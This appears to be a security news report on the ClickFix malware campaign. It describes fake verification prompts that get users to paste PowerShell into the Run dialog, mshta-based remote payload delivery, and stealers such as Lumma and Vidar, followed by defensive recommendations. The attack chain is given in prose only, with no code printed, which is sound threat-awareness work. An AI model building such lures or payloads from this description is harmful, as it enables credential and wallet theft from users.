A sophisticated cyber threat known as ClickFix has emerged, employing deceptive browser notifications and pop-ups labeled Fix Now and Bot Verification to lure users into initiating malware downloads. These seemingly innocuous prompts, when clicked, trigger a multi-stage infection process that installs persistent malware capable of credential theft, keylogging, and remote system access.
Campaign Overview
Security researchers have identified that ClickFix primarily targets users of financial institutions and e-commerce platforms. The attackers utilize advanced social engineering techniques to circumvent standard security protocols. The campaign often begins with compromised websites or malicious advertisements that generate convincing error messages or security alerts. These alerts falsely claim that the user’s device is infected or requires verification, creating a sense of urgency that prompts victims to click the deceptive buttons. The design of these notifications closely mimics legitimate browser warnings or security messages, making even security-conscious users susceptible to the deception.
Infection Mechanism
Upon clicking the Fix Now or Bot Verification buttons, obfuscated JavaScript code executes, initiating the download of seemingly benign files that serve as the initial stage of the attack chain. These files often masquerade as PDF documents or system utilities but contain embedded PowerShell commands that execute upon opening. This execution establishes persistence on the system and downloads the main malware components from command and control servers.
The malware employs complex obfuscation techniques to evade traditional detection methods. Once established, it begins harvesting sensitive information while maintaining a low system footprint to avoid detection. Researchers have observed it targeting stored passwords, cryptocurrency wallets, and financial credentials, while also implementing keylogging functionality to capture additional sensitive information.
Technical Analysis
The infection sequence begins when users click the malicious Fix Now or Bot Verification buttons, triggering obfuscated JavaScript that evaluates to a payload. This code creates a hidden iframe and then executes an encoded PowerShell command that downloads and executes the main malware payload.
The malware authors frequently rotate their command and control infrastructure, with researchers tracking numerous unique domains used in the past month alone. This rapid infrastructure change complicates efforts to block or take down the malicious servers.
Evolution of ClickFix
ClickFix has evolved significantly since its initial identification. Early variants primarily displayed fake browser update pages, but recent versions have incorporated more advanced deception techniques. For instance, some variants employ fake reCAPTCHA or Cloudflare Turnstile verification challenges to trick users into executing malicious PowerShell code. This represents a significant evolution from earlier versions that relied on fake browser updates.
In some cases, the malware uses compressed and base64-encoded data that must be decrypted before execution. The ClickFix lures presented to users include either a fake Cloudflare Turnstile verification that claims to detect unusual web traffic or a fake reCAPTCHA challenge alongside a DNS error message. Both lures instruct users to open the Run command (Win+R) and execute a PowerShell command that’s automatically copied to their clipboard.
Attack Analysis
The attack starts with a brief JavaScript code injected into compromised websites, which loads legitimate dependencies like web3, pako, and crypto-js. This initial script interacts with smart contracts to retrieve and execute additional code segments. The malware uses compressed and base64-encoded data that must be decrypted before execution.
The ClickFix lures presented to users include either a fake Cloudflare Turnstile verification that claims to detect unusual web traffic or a fake reCAPTCHA challenge alongside a DNS error message. Both lures instruct users to open the Run command (Win+R) and execute a PowerShell command that’s automatically copied to their clipboard.
The PowerShell commands execute mshta.exe with remote scripts that deliver payloads including Emmenhtal Loader and ultimately Lumma Stealer or Vidar Stealer. Researchers noted that the ClearFake infrastructure includes over 9,300 compromised websites, with thousands of users potentially exposed to these malicious lures every day. The use of blockchain technology for malware delivery represents an emerging threat that makes traditional mitigation and blocking significantly more challenging.
Recommendations
To protect against ClickFix attacks, organizations and individuals should:
– Exercise Caution with Unexpected Prompts: Be wary of unsolicited browser notifications or pop-ups urging immediate action.
– Verify Sources: Before clicking on any Fix Now or Bot Verification buttons, confirm the legitimacy of the source.
– Keep Software Updated: Regularly update browsers and security software to the latest versions to benefit from security patches.
– Educate Users: Provide training on recognizing and avoiding social engineering tactics used in malware campaigns.
– Implement Robust Security Measures: Deploy comprehensive security solutions that can detect and prevent such sophisticated attacks.
By staying informed and vigilant, users can significantly reduce the risk of falling victim to ClickFix and similar malware campaigns.
